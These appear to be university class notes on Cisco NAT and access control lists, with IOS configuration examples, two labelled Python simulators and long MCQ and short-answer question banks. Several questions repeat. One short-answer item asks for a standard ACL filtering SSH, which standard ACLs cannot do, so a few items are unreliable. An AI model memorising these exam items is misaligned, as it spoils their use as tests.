24. How does AAA authentication contribute to auditing and compliance requirements in
network environments?
25. Configure AAA accounting to log user activity for a specific network device.
26. Explain the role of AAA authentication in preventing unauthorized access to network
resources.
27. Assess the impact of a compromised authentication server on network security.
28. Create a AAA authentication configuration that allows users to authenticate using biometric
credentials.
29. What are the different methods of implementing AAA authentication in Cisco devices?
BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

NAT
CLASS NOTES

Q.1. What is NAT?


Network Address Translation translates the private addresses into public
addresses before packets are routed to a public network. It allows a
network device such as a router to translate addresses between the private
and public network.

Q.2. In what situations is NAT required?


1. When we need to connect to the internet and our hosts don't have globally
unique IP addresses.
2. When we want to hide internal IP addresses from the outside for security purposes.
3. When a company merges with another company that uses the same address space.

Q.3.What are the advantages of Nat?


1. It conserves legally registered IP addresses.
2. It prevents address overlapping.
3. Provides security by hiding internal (private) IP addresses.
4. Eliminates address renumbering as a network evolves.

Q.4.What are different types of NAT?


There are mainly three types of NAT:
1. Static NAT
2. Dynamic NAT
3. Port Address Translation (Overloading)

Q.5.What is Static NAT?


Static NAT allows a one-to-one mapping: it translates one private IP address to
one public IP address.
R1(config)# ip nat inside source static 10.1.1.1 15.36.2.1
R1(config)# int fa0/0
R1(config-if)# ip nat inside        ! identifies this interface as the inside interface
R1(config)# int fa0/1
R1(config-if)# ip nat outside       ! identifies this interface as the outside interface

In the ip nat inside source command, "inside source" means the translation is
applied to the source address of packets arriving on the inside interface, the
starting point of the translation.

Q.6. What is Dynamic NAT?


It maps an unregistered IP address to a registered IP address from out of a
pool of registered IP addresses.
R1(config)# ip nat pool CCNA 190.1.1.5 190.1.1.254 netmask 255.255.255.0
R1(config)# ip nat inside source list 10 pool CCNA
R1(config)# int fa0/0
R1(config-if)# ip nat inside        ! identifies this interface as the inside interface
R1(config)# int fa0/1
R1(config-if)# ip nat outside       ! identifies this interface as the outside interface
R1(config)# access-list 10 permit 192.168.1.0 0.0.0.255   ! selects which unregistered addresses are translated

Q.7. What is Port Address Translation (Overloading)?


It maps multiple unregistered IP addresses to a single registered IP address by
using different port numbers. PAT allows thousands of users to connect to the
internet using only one public address.
R1(config)# ip nat pool CCNA 190.1.1.5 190.1.1.254 netmask 255.255.255.0
R1(config)# ip nat inside source list 10 pool CCNA overload
R1(config)# int fa0/0
R1(config-if)# ip nat inside        ! identifies this interface as the inside interface
R1(config)# int fa0/1
R1(config-if)# ip nat outside       ! identifies this interface as the outside interface
R1(config)# access-list 10 permit 192.168.1.0 0.0.0.255   ! selects which unregistered addresses are translated

The overload keyword is what turns the pool into PAT. When only the router's own
public address is available, the usual form is
ip nat inside source list 10 interface fa0/1 overload, which overloads the
outside interface's address instead of a pool.

Q.8. What are Inside Local, Inside Global, Outside Local, and Outside Global addresses?
An inside local address is the address of an inside host as seen on the inside
network, that is, before translation (10.1.1.1 in the static example above).
An inside global address is the address of that same inside host as it appears on
the outside network, that is, after translation (15.36.2.1 above).
An outside local address is the address of an outside host as it appears to hosts
on the inside network.
An outside global address is the address of the outside host as assigned by its
owner, that is, its real public address.
When only inside addresses are translated, which is the usual case, the outside
local and outside global addresses are the same.

Static NAT (Network Address Translation) is a one-to-one mapping of a private IP
address to a public IP address. It is useful when a network device inside a
private network needs to be accessible from the internet.

2022-23 Prepared by: Dept. Of Cyber Security (Brainware University, Barasat)


Dynamic NAT (Network Address Translation) is the mapping of a private IP address to
a public IP address taken from a group of public IP addresses called a NAT pool.
Dynamic NAT still establishes a one-to-one mapping between a private IP address and
a public IP address, but the public address is taken from the pool configured on
the NAT router, so which public address a given private address gets may vary with
what is available in the pool.

PAT (Port Address Translation) is another form of dynamic NAT that maps multiple
private IP addresses to a single public IP address by translating the
transport-layer port as well as the address.

When a client on the inside network communicates with a host on the internet, the
router replaces the source address with its public address and, where necessary,
replaces the source port (TCP or UDP) with another port number. These port mappings
are kept in a table. When the router receives a reply from the internet, it looks
up the destination port in that table and forwards the packet to the original
sender.
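The table-driven behaviour just described, as an added example that is not part of the page and not Cisco code: a toy PAT router that translates outbound flows, keeps the inside host's original source port when it is still free on the public address (as IOS does) and allocates a new one only on collision, rewrites replies from the table, and drops inbound packets with no entry. Its translations() rows use the same five columns and terms as Q.8 above. All addresses are constructed; 192.168.1.0/24 is private space and 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.

```python
"""Added example (not from the page): a toy PAT translation table.

The router rewrites each outbound flow's source to its one public address plus a
port, records the mapping, and uses it to rewrite replies.  The inside host's
original source port is kept when it is still free on the public address and a
new one is allocated only on collision.  A packet arriving from outside with no
matching entry is dropped, which is the "hiding" effect described above: without
an entry (or a static mapping) an inside host cannot be reached from outside.
All addresses are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str = "tcp"


class PATRouter:
    def __init__(self, inside_global: str, first_spare_port: int = 1024) -> None:
        self.inside_global = inside_global              # the single public address
        self.next_spare = first_spare_port
        # (proto, inside local ip, inside local port) -> (global port, outside ip, outside port)
        self.out: Dict[Tuple[str, str, int], Tuple[int, str, int]] = {}
        # (proto, global port) -> (inside local ip, inside local port)
        self.back: Dict[Tuple[str, int], Tuple[str, int]] = {}

    def _allocate_port(self, proto: str, wanted: int) -> int:
        if (proto, wanted) not in self.back:
            return wanted                               # original port still free: keep it
        while (proto, self.next_spare) in self.back:    # collision: take the next spare port
            self.next_spare += 1
        port = self.next_spare
        self.next_spare += 1
        return port

    def outbound(self, p: Packet) -> Packet:
        """Inside -> outside: translate the source, creating a table entry if needed."""
        key = (p.proto, p.src_ip, p.src_port)
        if key not in self.out:
            gport = self._allocate_port(p.proto, p.src_port)
            self.out[key] = (gport, p.dst_ip, p.dst_port)
            self.back[(p.proto, gport)] = (p.src_ip, p.src_port)
        return Packet(self.inside_global, self.out[key][0], p.dst_ip, p.dst_port, p.proto)

    def inbound(self, p: Packet) -> Optional[Packet]:
        """Outside -> inside: only packets matching an existing entry get through."""
        if p.dst_ip != self.inside_global:
            return None
        entry = self.back.get((p.proto, p.dst_port))
        if entry is None:
            return None                                 # unsolicited: no translation, dropped
        local_ip, local_port = entry
        return Packet(p.src_ip, p.src_port, local_ip, local_port, p.proto)

    def translations(self) -> List[Tuple[str, str, str, str, str]]:
        """Rows as IOS prints them: Pro, Inside global, Inside local, Outside local, Outside global."""
        rows = []
        for (proto, lip, lport), (gport, oip, oport) in self.out.items():
            outside = f"{oip}:{oport}"                  # only inside addresses are translated here
            rows.append((proto, f"{self.inside_global}:{gport}", f"{lip}:{lport}", outside, outside))
        return rows


def demo() -> dict:
    """Two inside hosts pick the same source port; one reply and one unsolicited packet arrive."""
    r = PATRouter("203.0.113.1")
    a = r.outbound(Packet("192.168.1.10", 50000, "198.51.100.20", 443))
    b = r.outbound(Packet("192.168.1.11", 50000, "198.51.100.20", 443))   # same source port: collision
    reply_to_b = r.inbound(Packet("198.51.100.20", 443, "203.0.113.1", b.src_port))
    unsolicited = r.inbound(Packet("198.51.100.99", 40000, "203.0.113.1", 8080))
    return {"a": a, "b": b, "reply_to_b": reply_to_b, "unsolicited": unsolicited, "table": r.translations()}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The unsolicited case is the whole of NAT's "security" benefit: it is a side effect of needing a table entry, not a filter, so a static mapping or any outbound flow to the attacker's address reopens the path. An ACL on the outside interface is still needed for real inbound policy.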


MCQ
1. What is Network Address Translation (NAT)?
2. What is the purpose of Network Address Translation (NAT) in a network?
3. Which layer of the OSI model does NAT operate at?
4. What is the difference between static NAT and dynamic NAT?
5. How does Network Address Translation (NAT) help conserve IPv4 address space?
6. Which type of NAT allows multiple devices on an internal network to share a single
public IP address?
7. What is the difference between source NAT and destination NAT?
8. What is a NAT translation table?
9. Which NAT mechanism allows devices behind a NAT device to establish connections
with external devices?
10. What is the purpose of NAT overload?
11. What is the difference between NAT and PAT?
12. What is the purpose of NAT traversal?
13. What are the benefits of using NAT for security purposes?
14. What is a NAT translation error?
15. Which command is used to configure static NAT on a Cisco router?
16. Which NAT mechanism is used for mapping a range of internal IP addresses to a
range of public IP addresses?
17. Which statement accurately describes NAT overload?
18. Which type of NAT allows traffic initiated from the internal network to flow out to the
internet but prevents unsolicited inbound traffic?
19. What is the purpose of NAT in load balancing scenarios?
20. What is the purpose of NAT in high availability scenarios?
21. What is the purpose of NAT in VPN connections?
22. What is the difference between inside local, inside global, outside local, and outside
global addresses in NAT?
23. What is the purpose of NAT reflection?
24. What are the limitations of using NAT in a network environment?
25. What is a NAT translation error?
26. What is the purpose of NAT traversal?
27. What is the purpose of a NAT gateway?
28. What is the difference between static NAT and dynamic NAT?
29. What is the purpose of NAT in a network?
30. Which statement accurately describes PAT (Port Address Translation)?
31. What is the purpose of NAT in load balancing scenarios?
32. What is the purpose of NAT in VPN connections?

SAQ
1. What is Network Address Translation (NAT)?
2. Differentiate between static NAT and dynamic NAT.
3. How does NAT help conserve IPv4 address space?
4. Configure a static NAT translation that maps an internal IP address to a specific
public IP address.
5. Explain the process of NAT translation and how it allows devices with private IP
addresses to communicate with devices on the public internet.
6. Evaluate the advantages and disadvantages of using NAT in a network
environment.
7. Design a NAT configuration that allows multiple devices on an internal network to
share a single public IP address using port address translation (PAT).
8. What are the different types of NAT available in Cisco devices?
9. What is the purpose of NAT overload?
10. How does NAT affect the end-to-end connectivity and communication between
devices in a network?
11. Configure a dynamic NAT pool with a range of public IP addresses for translation.
12. Discuss the potential impact of NAT on network performance and latency.
13. Assess the significance of proper NAT configuration and mapping for seamless
network communication.
14. Create a NAT configuration that allows inbound traffic from a specific external IP
address to an internal server with a private IP address.
15. What are the benefits of using NAT for security purposes?
16. What is the difference between source NAT and destination NAT?
17. How does NAT handle incoming and outgoing traffic differently?
18. Configure a NAT exemption rule to bypass NAT translation for specific traffic.
19. Explain the role of NAT in load balancing and high availability scenarios.
20. Assess the impact of a misconfigured NAT configuration on network connectivity.
21. Design a NAT configuration that allows remote access to internal resources using
VPN tunnels.
22. What is the difference between NAT and PAT?
23. What is a NAT translation table, and how does it function?
24. How does NAT traversal enable communication between devices behind NAT
devices?
25. Configure a one-to-one NAT mapping to allow direct communication between two
internal hosts and their corresponding public IP addresses.
26. Discuss the potential challenges of implementing NAT in a network with peer-to-
peer applications.
27. Evaluate the security implications of NAT for hiding internal IP addresses.
28. Create a NAT configuration that allows outbound traffic from an internal network to
the internet while logging all translated IP addresses.
29. What are the limitations of using NAT in a network environment?
30. What is the purpose of configuring NAT on a border router?
ACL

ACCESS CONTROL LIST


CLASS NOTES
Introduction

Cisco Access Control Lists (ACLs) are used in nearly all product lines for several purposes, including
filtering packets (data traffic) as they cross from an inbound port to an outbound port on a router or
switch, defining classes of traffic, and restricting access to devices or services. Knowing how to
design, configure, and troubleshoot ACLs is required for all network engineers working within a
Cisco network.

Objectives:-

The objective is to provide a fundamental explanation of Cisco ACLs with the following topics:

1. An analogy about filtering
2. The uses of ACLs
3. Types of ACLs, operations and best practices
4. Wildcard Masks
5. Configuring named ACLs with examples
6. Monitoring ACLs

Use of ACLs:-

The graphic further clarifies the idea. It is the company’s policy that not all traffic from the computer
on the left will be allowed to exit the router via the interface on the right. Virtually all companies
have a detailed security policy (or should have one), and that policy is followed to implement
proper filtering.

One of the two major reasons to use ACLs in a Cisco network is to either filter traffic going
through the router or switch, or traffic to and from the device. The other reason is to classify traffic
for access to services or to trigger an event.

As the graphic shows, a good place for a filter is between the enterprise network and the Internet.
An entire range of firewalling technologies exist here, and ACLs are one tool.

The graphic illustrates three more uses of ACLs to classify traffic (IP addresses) for specific purposes. For
example, filtering can be used to identify the traffic which is allowed to traverse a virtual private
network (VPN), and the block of IP addresses to be translated by the network address translation
(NAT) process.

Also, routers and multi-layer switches run dynamic routing protocols such as Open Shortest Path First
(OSPF) and Enhanced Interior Gateway Routing Protocol (EIGRP) to exchange lists of reachable IP networks.
These updates can be filtered with ACLs to limit the number of IP addresses in the list of routes
learned.

Types of ACL:-

ACL Type          Description
Standard ACL       Checks source address
                   Generally permits or denies entire protocol suite
Extended ACL       Checks source and destination address
                   Generally permits or denies specific protocols and applications
Named ACL         Named ACLs use a descriptive name or number for identification.
Numbered ACL      Numbered ACLs use a number for identification.

Access lists are categorized based on the granularity of the filtering. Similar to the analogy, the
match criteria to ride the chartered trolleys are much more specific than those to ride the city bus.
Multiple protocols have ACLs in Cisco, but IP is by far the most common and the only one described here.
Standard Access Lists use the simplest matching criteria of all: the source IP address in the IP
packet. Based on matching the source IP address, permit or deny logic can be applied.

As the name implies, Extended Access Lists use a much more detailed list of match criteria,
including source IP address, destination IP address, protocol type field in the IP header, TCP/UDP
port number, and additional criteria such as time range.

For both types, the wildcard mask identifies a “range” or block of addresses or a specific host.

Cisco ACLs may be numbered or named. A range of numbers for each type of list has been defined by
Cisco, and numbered ACLs have been used for years. The named access list is more convenient
and easier to edit. The operation of each is identical. Named access lists are recommended for
engineers learning ACLs for the first time. Configuration syntax will be covered later.

How to Identify ACLs

ACL Configuration Guidelines

 Standard or extended indicates what can be filtered.
 Only one ACL per interface, per protocol, and per direction is allowed.
 The order of ACL statements controls testing; therefore, the most specific statements go at the
top of the list.
 The last ACL test is always an implicit deny everything else statement, so every list needs at
least one permit statement.
 ACLs are created globally and then applied to interfaces for inbound or outbound traffic.
 An ACL can filter traffic going through the router, or traffic to and from the router, depending
on how it is applied.
 When placing ACLs in the network:
   – Place extended ACLs close to the source
   – Place standard ACLs close to the destination

The graphic shows router logic in checking for the existence of and using an outbound ACL. One
thing to note with an outbound list is that the router has already expended the resources to route
the packet before the permit/deny logic is applied to the packet. If the ACL is inbound, the
permit/deny logic is applied before the routing process occurs.

Each line in the list is processed in top-down order. As soon as a match for either permit or deny
happens, the required action is taken and the list processing stops. That is why it is so important to
permit or deny specific items such as hosts before permitting or denying entire subnets or larger
address blocks.

The last line in all ACLs is an implicit deny of all packets.
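As an added example (not part of the course notes), the following Python simulator shows how a standard ACL is evaluated: wildcard-mask matching, top-down first-match processing, and the implicit deny at the end. The ACL lines and addresses are constructed for illustration; the two lists show why a specific host entry must come before the subnet entry that contains it.

```python
import ipaddress

# Added example, not from the course notes: a small simulator of how a Cisco
# standard ACL is evaluated. ACL lines, addresses and masks are constructed.

def wildcard_match(addr, base, wildcard):
    """Cisco wildcard-mask test: a 0 bit must match, a 1 bit is 'don't care'."""
    a = int(ipaddress.IPv4Address(addr))
    b = int(ipaddress.IPv4Address(base))
    w = int(ipaddress.IPv4Address(wildcard))
    return (a & ~w) == (b & ~w)

def parse_standard_ace(line):
    """Parse 'permit|deny any', 'permit|deny host A' or 'permit|deny A WILDCARD'."""
    parts = line.split()
    action = parts[0]
    if parts[1] == "any":
        return action, "0.0.0.0", "255.255.255.255"
    if parts[1] == "host":
        return action, parts[2], "0.0.0.0"
    return action, parts[1], parts[2]

def evaluate_standard_acl(acl_lines, src_ip):
    """Top-down, first match wins; no match falls through to the implicit deny.
    Returns (action, index of the matching line, or None for the implicit deny)."""
    for idx, line in enumerate(acl_lines):
        action, base, wildcard = parse_standard_ace(line)
        if wildcard_match(src_ip, base, wildcard):
            return action, idx
    return "deny", None   # implicit 'deny any' at the end of every ACL

# Constructed lists. BAD_ORDER puts the subnet permit before the host deny,
# so the host deny can never fire; GOOD_ORDER lists the specific host first.
BAD_ORDER = ["permit 192.168.1.0 0.0.0.255", "deny host 192.168.1.5"]
GOOD_ORDER = ["deny host 192.168.1.5", "permit 192.168.1.0 0.0.0.255"]

if __name__ == "__main__":
    for name, acl in (("BAD_ORDER", BAD_ORDER), ("GOOD_ORDER", GOOD_ORDER)):
        for ip in ("192.168.1.5", "192.168.1.77", "10.0.0.9"):
            print(name, ip, evaluate_standard_acl(acl, ip))
```

Running it shows 192.168.1.5 permitted by line 0 of BAD_ORDER but denied by line 0 of GOOD_ORDER, and 10.0.0.9 denied by the implicit deny in both lists.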


MCQ

1. What is an Access Control List (ACL)?
2. Which layer of the OSI model does an ACL operate at?
3. What is the default behavior of an ACL if no permit or deny statements match
the traffic?
4. Which types of ACL can be created on a Cisco device?
5. What is the range of standard ACL numbers on Cisco routers?
6. What is the range of extended ACL numbers on Cisco routers?
7. What is the order of evaluation for ACL entries?
8. Which wildcard mask would match all IP addresses in a subnet?
9. What is the purpose of a wildcard mask in an ACL?
10. Which statement accurately describes standard ACLs?
11. What is the limitation of using standard ACLs?
12. What is the key advantage of using extended ACLs over standard ACLs?
13. Which type of ACL is commonly used for filtering traffic at the edge of a
network?
14. What is the wildcard mask for a subnet with a prefix length of 24?
15. Which statement accurately describes reflexive ACLs?
16. Which command is used to apply an ACL to a specific interface on a Cisco
router?
17. Which action is performed by a router when a packet matches a deny
statement in an ACL?
18. Which statement accurately describes time-based ACLs?
19. What is the purpose of the "established" keyword in an extended ACL?
20. Which type of ACL is used to filter traffic based on upper-layer protocols and
port numbers?
21. What is the purpose of the "log" keyword in an ACL rule?
22. Which command is used to verify the configuration and applied ACLs on a
Cisco router?


SAQ

1. What is an Access Control List (ACL)?
2. Differentiate between standard and extended ACLs.
3. How does an ACL determine which packets are allowed or denied access to a
network?
4. Write an ACL statement that permits all traffic from source IP address
192.168.1.0/24 to destination IP address 10.0.0.0/24.
5. Explain the order in which ACL statements are processed and how that affects
packet filtering.
6. Evaluate the advantages and disadvantages of using ACLs for network security.
7. Design an ACL that allows HTTP traffic from any source IP address but denies
FTP traffic from IP address 192.168.1.5.
8. What are the different types of ACLs available on Cisco devices?
9. What is the purpose of an ACL wildcard mask?
10. How does an implicit "deny all" statement affect the behavior of an ACL?
11. Configure an ACL to permit Telnet traffic from a specific source IP address while
denying all other Telnet traffic.
12. Discuss the potential impact of an incorrect ACL configuration on network traffic
flow.
13. Assess the significance of proper ACL placement within a network topology.
14. Create an extended ACL that allows ICMP traffic from any source IP address to a
specific destination IP address.
15. What are the two primary categories of ACLs based on the direction of packet
filtering?
16. What is the purpose of a numbered ACL?
17. How does a named ACL differ from a numbered ACL in terms of configuration
and usage?
18. Configure a standard ACL that permits SSH traffic from a specific source network
while denying all other SSH traffic.
19. Explain the potential consequences of overlapping ACL statements and how to
resolve them.
20. Assess the impact of a misconfigured ACL on network performance and security.
21. Design an ACL that allows HTTP traffic from a specific source IP address range
and denies HTTPS traffic from any source IP address.
22. What is the order of evaluation for ACL entries?
23. What is an ACL hit count, and how can it be used for troubleshooting?
24. How does an extended ACL differ from a standard ACL in terms of filtering
criteria?
25. Configure an ACL to permit DNS traffic from any source IP address but deny
ICMP traffic from a specific source IP address.
26. Discuss the role of wildcard masks in defining ACL filtering criteria.
